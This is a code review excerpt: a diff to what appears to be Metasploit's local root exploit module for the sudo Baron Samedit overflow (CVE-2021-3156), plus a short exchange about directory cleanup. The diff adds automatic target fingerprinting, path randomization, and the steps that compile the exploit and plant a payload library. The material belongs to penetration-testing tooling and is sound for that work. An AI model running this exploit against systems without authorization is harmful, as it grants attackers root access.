modules/exploits/linux/local/sudo_baron_samedit.rb

```diff
@@ -112,24 +113,43 @@ def check
   def upload(path, data)
     print_status "Writing '#{path}' (#{data.size} bytes) ..."
     write_file path, data
+    register_file_for_cleanup(path)
+  end
+
+  def get_automatic_target
+    sysinfo = get_sysinfo
+
+    target = targets.find { |target| target.opts[:version_fingerprint]&.match(sysinfo[:version]) }
+    fail_with(Failure::NoTarget, 'Failed to automatically identify the target.') if target.nil?
+    print_status("Using automatically selected target: #{target.name}")
+    target
   end
 
   def exploit
     if target.name == 'Manual'
       fail_with(Failure::BadConfig, 'The "Lengths" advanced option must be specified for the manual target') if datastore['Lengths'].blank?
-      arguments = datastore['Lengths'].gsub(/,/, ' ').gsub(/  +/, ' ')
+      lengths = datastore['Lengths'].gsub(/,/, ' ').gsub(/  +/, ' ')
     else
-      arguments = target[:lengths].join(' ')
+      lengths = (target.name == 'Automatic' ? get_automatic_target : target)[:lengths].join(' ')
     end
 
     fail_with(Failure::NotFound, 'The gcc binary was not found') unless has_gcc?
 
     path = datastore['WritableDir']
-    cmd_exec("mkdir -p #{path}/libnss_X")
 
-    file_name = rand_text_alphanumeric(5..10)
-    upload_and_compile("#{path}/#{file_name}", exploit_data('CVE-2021-3156', 'exploit.c'), '-lutil')
-    upload("#{path}/libnss_X/P0P_SH3LLZ_ .so.2", generate_payload_dll)
-    cmd_exec("#{path}/#{file_name} #{arguments}")
+    exe_file_name = rand_text_alphanumeric(5..10)
+    overwrite_path = rand_overwrite_path  # the part that is overwritten in memory to construct the full path
+    lib_file_path = "libnss_#{overwrite_path} .so.2"  # the full path
+
+    upload_and_compile("#{path}/#{exe_file_name}", exploit_data('CVE-2021-3156', 'exploit.c'), '-lutil')
+    register_files_for_cleanup("#{path}/#{exe_file_name}")
+    mkdir("#{path}/#{lib_file_path.rpartition('/').first}")
```

Comment:
Minor: How about using register_dir_for_cleanup ?

Reply:
That's handled [automatically](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/file.rb#L94) by `#mkdir` so it doesn't need to be done explicitly.